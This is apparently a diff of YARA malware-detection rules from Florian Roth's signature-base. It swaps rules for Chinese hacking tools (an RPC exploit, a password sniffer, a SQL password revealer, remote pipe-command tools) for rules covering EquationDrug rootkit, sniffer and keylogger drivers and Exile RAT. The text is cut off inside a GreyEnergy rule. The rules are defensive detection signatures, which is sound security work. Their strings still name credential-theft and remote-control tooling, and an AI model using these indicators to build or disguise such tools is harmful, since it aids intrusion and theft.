+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/spy_equation_fiveeyes.yar#L346-L364"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "08bbe6312342b28b43201125bd8c518531de8082"
-		logic_hash = "226be7ea7b09b2b87eeec006c8054b9fb59eb8324def14a4a0db97f94fb39d62"
-		score = 75
+		logic_hash = "dd7f72c2263a3af9b8c9072b415a3b066e821e000b52ddd684ecb6b80a99067a"
+		score = 60
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "- Rewritten by HDM last <hdm [at] metasploit.com>" fullword ascii
-		$s2 = "- Usage: %s <Target ID> <Target IP>" fullword ascii
-		$s3 = "- Remote DCOM RPC Buffer Overflow Exploit" fullword ascii
-		$s4 = "- Warning:This Code is more like a dos tool!(Modify by pingker)" fullword ascii
-		$s5 = "Windows NT SP6 (Chinese)" fullword ascii
-		$s6 = "- Original code by FlashSky and Benjurry" fullword ascii
-		$s7 = "\\C$\\123456111111111111111.doc" wide
-		$s8 = "shell3all.c" fullword ascii
+		$s1 = "i386\\DesertWinterDriver.pdb" fullword
+		$s2 = "Performing UR-specific post-install..."
+		$s3 = "Timeout waiting for the \"canInstallNow\" event from the implant-specific EXE!"
+		$s4 = "STRAITSHOOTER30.exe"
+		$s5 = "standalonegrok_2.1.1.1"
+		$s6 = "c:\\users\\rmgree5\\"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and 2 of them
+		uint16( 0 ) == 0x5a4d and filesize < 500000 and all of ( $s* )
 }
-rule SIGNATURE_BASE_Isdebug_V1_4 : FILE
+rule SIGNATURE_BASE_Equationdrug_Networksniffer1
 {
 	meta:
-		description = "Chinese Hacktool Set - file IsDebug V1.4.dll"
+		description = "EquationDrug - Backdoor driven by network sniffer - mstcp32.sys, fat32.sys"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f9b4a909-e0e5-5708-8794-39250b9d56cc"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L990-L1010"
+		id = "21a500e7-3011-50e6-b685-f4f65d6dee17"
+		date = "2015-03-11"
+		modified = "2023-01-06"
+		reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/spy_equation_fiveeyes.yar#L368-L388"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "ca32474c358b4402421ece1cb31714fbb088b69a"
-		logic_hash = "d656327c33533b5ef7dc70ec00250ee35d878794fae189829a0ecad958f96616"
+		hash = "26e787997a338d8111d96c9a4c103cf8ff0201ce"
+		logic_hash = "ec90cba3b790c52f475a08b586f5af5a88ec46cfcf8abd74435981a34dfdb3f7"
 		score = 75
-		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		quality = 35
+		tags = ""
 
 	strings:
-		$s0 = "IsDebug.dll" fullword ascii
-		$s1 = "SV Dumper V1.0" fullword wide
-		$s2 = "(IsDebuggerPresent byte Patcher)" fullword ascii
-		$s8 = "Error WriteMemory failed" fullword ascii
-		$s9 = "IsDebugPresent" fullword ascii
-		$s10 = "idb_Autoload" fullword ascii
-		$s11 = "Bin Files" fullword ascii
-		$s12 = "MASM32 version" fullword ascii
+		$s0 = "Microsoft(R) Windows (TM) Operating System" fullword wide
+		$s1 = "\\Registry\\User\\CurrentUser\\" wide
+		$s3 = "sys\\mstcp32.dbg" fullword ascii
+		$s7 = "mstcp32.sys" fullword wide
+		$s8 = "p32.sys" fullword ascii
+		$s9 = "\\Device\\%ws_%ws" wide
+		$s10 = "\\DosDevices\\%ws" wide
+		$s11 = "\\Device\\%ws" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 30KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_HTTPSCANNER : FILE
+rule SIGNATURE_BASE_Equationdrug_Compatlayer_Unilaydll : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file HTTPSCANNER.EXE"
-		author = "Florian Roth (Nextron Systems)"
-		id = "470c90f5-bb98-59ab-bff4-f6238c318e36"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L1012-L1026"
+		description = "EquationDrug - Unilay.DLL"
+		author = "Florian Roth (Nextron Systems) @4nc4p"
+		id = "32fd31c7-cc44-50e1-8888-b9da59ce587b"
+		date = "2015-03-11"
+		modified = "2025-03-29"
+		reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/spy_equation_fiveeyes.yar#L390-L402"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "ae2929346944c1ea3411a4562e9d5e2f765d088a"
-		logic_hash = "0f1460101198d8b139b7cc0674bef2fc7b3d2a24249f521396b7bbe4318a83d5"
+		hash = "a3a31937956f161beba8acac35b96cb74241cd0f"
+		logic_hash = "86434bd0456ea0c9ac9ed74dc3cf63520eb6b880dd4ea7920d0e82873dfec21e"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "HttpScanner.exe" fullword wide
-		$s2 = "HttpScanner" fullword wide
+		$s0 = "unilay.dll" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3500KB and all of them
+		uint16( 0 ) == 0x5a4d and $s0
 }
-rule SIGNATURE_BASE_Hscan_V1_20_Pipecmd : FILE
+rule SIGNATURE_BASE_Equationdrug_Networksniffer2
 {
 	meta:
-		description = "Chinese Hacktool Set - file PipeCmd.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "957a8e3b-5f6c-5f3e-8973-88259c9cb0dc"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L1028-L1049"
+		description = "EquationDrug - Network Sniffer - tdip.sys"
+		author = "Florian Roth (Nextron Systems) @4nc4p"
+		id = "afc5ae23-4965-5796-af3b-9e2705aea455"
+		date = "2015-03-11"
+		modified = "2025-03-29"
+		reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/spy_equation_fiveeyes.yar#L419-L438"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "64403ce63b28b544646a30da3be2f395788542d6"
-		logic_hash = "91ed275896c2520893ba1af26b2563c0bd3564a9c5f9d812f35464469e27307b"
+		hash = "7e3cd36875c0e5ccb076eb74855d627ae8d4627f"
+		logic_hash = "d29744a801194e5488795a8167965b94290be477efe478ee3e71c4bc98733967"
 		score = 75
-		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		quality = 35
+		tags = ""
 
 	strings:
-		$s1 = "%SystemRoot%\\system32\\PipeCmdSrv.exe" fullword ascii
-		$s2 = "PipeCmd.exe" fullword wide
-		$s3 = "Please Use NTCmd.exe Run This Program." fullword ascii
-		$s4 = "%s\\pipe\\%s%s%d" fullword ascii
-		$s5 = "\\\\.\\pipe\\%s%s%d" fullword ascii
-		$s6 = "%s\\ADMIN$\\System32\\%s%s" fullword ascii
-		$s7 = "This is a service executable! Couldn't start directly." fullword ascii
-		$s8 = "Connecting to Remote Server ...Failed" fullword ascii
-		$s9 = "PIPECMDSRV" fullword wide
+		$s0 = "Microsoft(R) Windows (TM) Operating System" fullword wide
+		$s1 = "IP Transport Driver" fullword wide
+		$s2 = "tdip.sys" fullword wide
+		$s3 = "sys\\tdip.dbg" fullword ascii
+		$s4 = "dip.sys" fullword ascii
+		$s5 = "\\Device\\%ws_%ws" wide
+		$s6 = "\\DosDevices\\%ws" wide
+		$s7 = "\\Device\\%ws" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and 4 of them
+		all of them
 }
-rule SIGNATURE_BASE_Dos_Fp : FILE
+rule SIGNATURE_BASE_Equationdrug_Networksniffer3
 {
 	meta:
-		description = "Chinese Hacktool Set - file fp.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "f4427aab-50c3-5bb9-997a-75e162a83f8a"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L1051-L1067"
+		description = "EquationDrug - Network Sniffer - tdip.sys"
+		author = "Florian Roth (Nextron Systems) @4nc4p"
+		id = "c6b1658b-cbc6-535a-a3a2-15ce3cf6e4f6"
+		date = "2015-03-11"
+		modified = "2025-03-29"
+		reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/spy_equation_fiveeyes.yar#L440-L455"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "41d57d356098ff55fe0e1f0bcaa9317df5a2a45c"
-		logic_hash = "cc09743269ee36862c95c9323ad271ca9b6c350cf25163d126fef0f86bc6f671"
+		hash = "14599516381a9646cd978cf962c4f92386371040"
+		logic_hash = "18c516fe0cd74e7a02ee15260abf3d27bba992492e6042a148abdee3086a9a00"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$s1 = "fpipe -l 53 -s 53 -r 80 192.168.1.101" fullword ascii
-		$s2 = "FPipe.exe" fullword wide
-		$s3 = "http://www.foundstone.com" fullword ascii
-		$s4 = "%s %s port %d. Address is already in use" fullword ascii
+		$s0 = "Corporation. All rights reserved." fullword wide
+		$s1 = "IP Transport Driver" fullword wide
+		$s2 = "tdip.sys" fullword wide
+		$s3 = "tdip.pdb" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 65KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_Dos_Netstat : FILE
+rule SIGNATURE_BASE_Equationdrug_Volrec_Driver
 {
 	meta:
-		description = "Chinese Hacktool Set - file netstat.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "bc3141bf-4e82-5aa4-a8a6-a0a4586ee9a1"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L1069-L1085"
+		description = "EquationDrug - Collector plugin for Volrec - msrstd.sys"
+		author = "Florian Roth (Nextron Systems) @4nc4p"
+		id = "db4f3f65-bdc4-565d-ad59-25a16ec7c9d2"
+		date = "2015-03-11"
+		modified = "2025-03-29"
+		reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/spy_equation_fiveeyes.yar#L457-L471"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "d0444b7bd936b5fc490b865a604e97c22d97e598"
-		logic_hash = "e2b908308616c3f2c94849b4f22f0e9bb130b5759d89161604505ff25681be55"
+		hash = "ee2b504ad502dc3fed62d6483d93d9b1221cdd6c"
+		logic_hash = "24b8202a8590ddb1dd76e01499d02282ad40a6fd6f6b9020040381a370e91f40"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$s0 = "w03a2409.dll" fullword ascii
-		$s1 = "Retransmission Timeout Algorithm    = unknown (%1!u!)" fullword wide
-		$s2 = "Administrative Status  = %1!u!" fullword wide
-		$s3 = "Packet Too Big            %1!-10u!  %2!-10u!" fullword wide
+		$s0 = "msrstd.sys" fullword wide
+		$s1 = "msrstd.pdb" fullword ascii
+		$s2 = "msrstd driver" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 150KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Tools_Xsniff : FILE
+rule SIGNATURE_BASE_Equationdrug_Kernelrootkit
 {
 	meta:
-		description = "Chinese Hacktool Set - file xsniff.exe"
+		description = "EquationDrug - Kernel mode stage 0 and rootkit (Windows 2000 and above) - msndsrv.sys"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a0fdac88-a7b8-5d24-9012-2bfe7b07e675"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L1087-L1104"
+		id = "92491e30-4041-5c8b-8e4e-7bc2b1d3234b"
+		date = "2015-03-11"
+		modified = "2023-01-06"
+		reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/spy_equation_fiveeyes.yar#L473-L493"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "d61d7329ac74f66245a92c4505a327c85875c577"
-		logic_hash = "a32d07ecd635ad71edaa37d9b1e5f66d8ce5a7f84f1bba6eb06deb1f49a879c8"
+		hash = "597715224249e9fb77dc733b2e4d507f0cc41af6"
+		logic_hash = "4b41af8656ada1b4db7ec11f65aeb2d335f424d8557cfa74a064b40c65627012"
 		score = 75
-		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		quality = 60
+		tags = ""
 
 	strings:
-		$s0 = "xsiff.exe -pass -hide -log pass.log" fullword ascii
-		$s1 = "HOST: %s USER: %s, PASS: %s" fullword ascii
-		$s2 = "xsiff.exe -tcp -udp -asc -addr 192.168.1.1" fullword ascii
-		$s10 = "Code by glacier <glacier@xfocus.org>" fullword ascii
-		$s11 = "%-5s%s->%s Bytes=%d TTL=%d Type: %d,%d ID=%d SEQ=%d" fullword ascii
+		$s0 = "Microsoft(R) Windows (TM) Operating System" fullword wide
+		$s1 = "Parmsndsrv.dbg" fullword ascii
+		$s2 = "\\Registry\\User\\CurrentUser\\" wide
+		$s3 = "msndsrv.sys" fullword wide
+		$s5 = "\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Control\\Windows" wide
+		$s6 = "\\Device\\%ws_%ws" wide
+		$s7 = "\\DosDevices\\%ws" wide
+		$s9 = "\\Device\\%ws" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 220KB and 2 of them
+		all of them
 }
-rule SIGNATURE_BASE_Mssqlpass : FILE
+rule SIGNATURE_BASE_Equationdrug_Keylogger
 {
 	meta:
-		description = "Chinese Hacktool Set - file MSSqlPass.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "d45b417f-3649-5603-bd19-8b8bcc19dabc"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L1106-L1121"
+		description = "EquationDrug - Key/clipboard logger driver - msrtvd.sys"
+		author = "Florian Roth (Nextron Systems) @4nc4p"
+		id = "57b6af34-577b-58ec-9a9e-91911c32270b"
+		date = "2015-03-11"
+		modified = "2025-03-29"
+		reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/spy_equation_fiveeyes.yar#L495-L510"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "172b4e31ed15d1275ac07f3acbf499daf9a055d7"
-		logic_hash = "8037316eb157f8693bd342911af5fe5292f3ef8a3c169c80bc70edbabd7a92e6"
+		hash = "b93aa17b19575a6e4962d224c5801fb78e9a7bb5"
+		logic_hash = "b5db0e6e24979b07cd180fed11545daef281e7b0858a7de001a83c2cbc186557"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$s0 = "Reveals the passwords stored in the Registry by Enterprise Manager of SQL Server" wide
-		$s1 = "empv.exe" fullword wide
-		$s2 = "Enterprise Manager PassView" fullword wide
+		$s0 = "\\registry\\machine\\software\\Microsoft\\Windows NT\\CurrentVersion" wide
+		$s2 = "\\registry\\machine\\SYSTEM\\ControlSet001\\Control\\Session Manager\\En" wide
+		$s3 = "\\DosDevices\\Gk" wide
+		$s5 = "\\Device\\Gk0" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 120KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_Wsockexpert : FILE
+rule SIGNATURE_BASE_Equationdrug_Platformorchestrator
 {
 	meta:
-		description = "Chinese Hacktool Set - file WSockExpert.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "0ae115be-c516-5f4a-97ce-555d84f42947"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L1123-L1141"
+		description = "EquationDrug - Platform orchestrator - mscfg32.dll, svchost32.dll"
+		author = "Florian Roth (Nextron Systems) @4nc4p"
+		id = "ce19ed3c-9dd9-5cb0-99fe-c04fde057293"
+		date = "2015-03-11"
+		modified = "2025-03-29"
+		reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/spy_equation_fiveeyes.yar#L538-L555"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "2962bf7b0883ceda5e14b8dad86742f95b50f7bf"
-		logic_hash = "34ac3c5f0651ccab851d67da8863e0e305f981cf53a06d46c23f19736cc1c400"
+		hash = "febc4f30786db7804008dc9bc1cebdc26993e240"
+		logic_hash = "26c3b84a00702f155daa50c8f17e5f37e1aac46adde8a06a711e732a4cd806e9"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$s1 = "OpenProcessCmdExecute!" fullword ascii
-		$s2 = "http://www.hackp.com" fullword ascii
-		$s3 = "'%s' is not a valid time!'%s' is not a valid date and time" fullword wide
-		$s4 = "SaveSelectedFilterCmdExecute" fullword ascii
-		$s5 = "PasswordChar@" fullword ascii
-		$s6 = "WSockHook.DLL" fullword ascii
+		$s0 = "SERVICES.EXE" fullword wide
+		$s1 = "\\command.com" wide
+		$s2 = "Microsoft(R) Windows (TM) Operating System" fullword wide
+		$s3 = "LSASS.EXE" fullword wide
+		$s4 = "Windows Configuration Services" fullword wide
+		$s8 = "unilay.dll" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2500KB and 4 of them
+		all of them
 }
-rule SIGNATURE_BASE_Ms_Viru_Racle : FILE
+rule SIGNATURE_BASE_Equationdrug_Networksniffer5
 {
 	meta:
-		description = "Chinese Hacktool Set - file racle.dll"
+		description = "EquationDrug - Network-sniffer/patcher - atmdkdrv.sys"
 		author = "Florian Roth (Nextron Systems)"
-		id = "bdc78dcc-79e6-5516-bba2-54bf537eae38"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L1143-L1159"
+		id = "9eac2c51-3ad7-5346-a985-39733bc204c2"
+		date = "2015-03-11"
+		modified = "2023-01-06"
+		reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/spy_equation_fiveeyes.yar#L557-L575"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "13116078fff5c87b56179c5438f008caf6c98ecb"
-		logic_hash = "d36db04c6a62a72e9f3079d09aedc9056c0a5032b4594af4d02ba55373f8b6a4"
+		hash = "09399b9bd600d4516db37307a457bc55eedcbd17"
+		logic_hash = "84f009e2ef639e5270273a7d9dd2542fdf1386c4c8363071d711e2333a112cd1"
 		score = 75
-		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		quality = 60
+		tags = ""
 
 	strings:
-		$s0 = "PsInitialSystemProcess @%p" fullword ascii
-		$s1 = "PsLookupProcessByProcessId(%u) Failed" fullword ascii
-		$s2 = "PsLookupProcessByProcessId(%u) => %p" fullword ascii
-		$s3 = "FirstStage() Loaded, CurrentThread @%p Stack %p - %p" fullword ascii
+		$s0 = "Microsoft(R) Windows (TM) Operating System" fullword wide
+		$s1 = "\\Registry\\User\\CurrentUser\\" wide
+		$s2 = "atmdkdrv.sys" fullword wide
+		$s4 = "\\Device\\%ws_%ws" wide
+		$s5 = "\\DosDevices\\%ws" wide
+		$s6 = "\\Device\\%ws" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 210KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_Lamescan3 : FILE
+rule SIGNATURE_BASE_Equationdrug_Filesystem_Filter
 {
 	meta:
-		description = "Chinese Hacktool Set - file lamescan3.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "8ff1a0e6-d054-589d-a038-f889951ba250"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L1161-L1177"
+		description = "EquationDrug - Filesystem filter driver - volrec.sys, scsi2mgr.sys"
+		author = "Florian Roth (Nextron Systems) @4nc4p"
+		id = "7077daf6-3d51-5ff2-bc74-95cb169a7cd2"
+		date = "2015-03-11"
+		modified = "2025-03-29"
+		reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/spy_equation_fiveeyes.yar#L577-L591"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "3130eefb79650dab2e323328b905e4d5d3a1d2f0"
-		logic_hash = "8246128fa4378b0479a0c051965188c7c3fa0f52c8acc8934ef8af3155a85590"
+		hash = "57fa4a1abbf39f4899ea76543ebd3688dcc11e13"
+		logic_hash = "5da0c279da1b84a41e7d15df3c19cd50af1872156f133de0a367b9140425aa11"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$s1 = "dic\\loginlist.txt" fullword ascii
-		$s2 = "Radmin.exe" fullword ascii
-		$s3 = "lamescan3.pdf!" fullword ascii
-		$s4 = "dic\\passlist.txt" fullword ascii
+		$s0 = "volrec.sys" fullword wide
+		$s1 = "volrec.pdb" fullword ascii
+		$s2 = "Volume recognizer driver" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3740KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Tools_Pc : FILE
+rule SIGNATURE_BASE_Apt_Equation_Keyword : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file pc.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "11cc6c46-33c0-5c53-88f8-700be9ca8add"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L1179-L1195"
+		description = "Rule to detect Equation group's keyword in executable file"
+		author = "Florian Roth"
+		id = "a7d4eda5-f390-5099-9c46-bf74a878b4f0"
+		date = "2015-09-26"
+		modified = "2025-03-29"
+		reference = "http://securelist.com/blog/research/68750/equation-the-death-star-of-malware-galaxy/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/spy_equation_fiveeyes.yar#L593-L604"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "5cf8caba170ec461c44394f4058669d225a94285"
-		logic_hash = "1da263362e4c2ec8194bb80bfc3f25ff8c4b708919ba02ea02687d5404b99720"
+		logic_hash = "d9a2b31d078eabbc930e9ec06e5ead5a6cda4eebf1c0ebe8164caf75a9d3cba6"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "\\svchost.exe" ascii
-		$s2 = "%s%08x.001" fullword ascii
-		$s3 = "Qy001Service" fullword ascii
-		$s4 = "/.MIKY" fullword ascii
+		$a1 = "Backsnarf_AB25" wide
+		$a2 = "Backsnarf_AB25" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them
+		uint16( 0 ) == 0x5a4d and 1 of ( $a* )
 }
-rule SIGNATURE_BASE_Dos_Down64 : FILE
+
+rule SIGNATURE_BASE_MAL_Exilerat_Feb19_1 : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file Down64.exe"
+		description = "Detects Exile RAT"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b4907ede-dc6a-5b8c-bf1c-557df54191a4"
-		date = "2015-06-13"
+		id = "f0a510f3-5fea-59a7-8991-9d06dc478b2a"
+		date = "2019-02-04"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L1197-L1215"
+		reference = "https://creativecommons.org/licenses/by-nc/4.0/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_exile_rat.yar#L4-L26"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "43e455e43b49b953e17a5b885ffdcdf8b6b23226"
-		logic_hash = "d181c2075762fc3bb5b61bcdef57eb6533cb59dde03c4b901b6ce5b8323f3c8a"
+		logic_hash = "0556bc0dbd33502d5bf823cf265a4e133d9af43076abe35a86cf5e20ab314e35"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "3eb026d8b778716231a07b3dbbdc99e2d3a635b1956de8a1e6efc659330e52de"
 
 	strings:
-		$s1 = "C:\\Windows\\Temp\\Down.txt" fullword wide
-		$s2 = "C:\\Windows\\Temp\\Cmd.txt" fullword wide
-		$s3 = "C:\\Windows\\Temp\\" wide
-		$s4 = "ProcessXElement" fullword ascii
-		$s8 = "down.exe" fullword wide
-		$s20 = "set_Timer1" fullword ascii
+		$x1 = "Content-Disposition:form-data;name=\"x.bin\"" fullword ascii
+		$s1 = "syshost.dll" fullword ascii
+		$s2 = "\\scout\\Release\\scout.pdb" ascii
+		$s3 = "C:\\data.ini" fullword ascii
+		$s4 = "my-ip\" value=\"" fullword ascii
+		$s5 = "ver:%d.%d.%d" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 150KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 500KB and ( pe.imphash ( ) == "da8475fc7c3c90c0604ce6a0b56b5f21" or 3 of them )
 }
-rule SIGNATURE_BASE_Epathobj_Exp32 : FILE
+
+rule SIGNATURE_BASE_APT_Greyenergy_Malware_Oct18_1 : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file epathobj_exp32.exe"
+		description = "Detects samples from Grey Energy report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ca4639af-ee4f-5220-9595-e7a06b9a8534"
-		date = "2015-06-13"
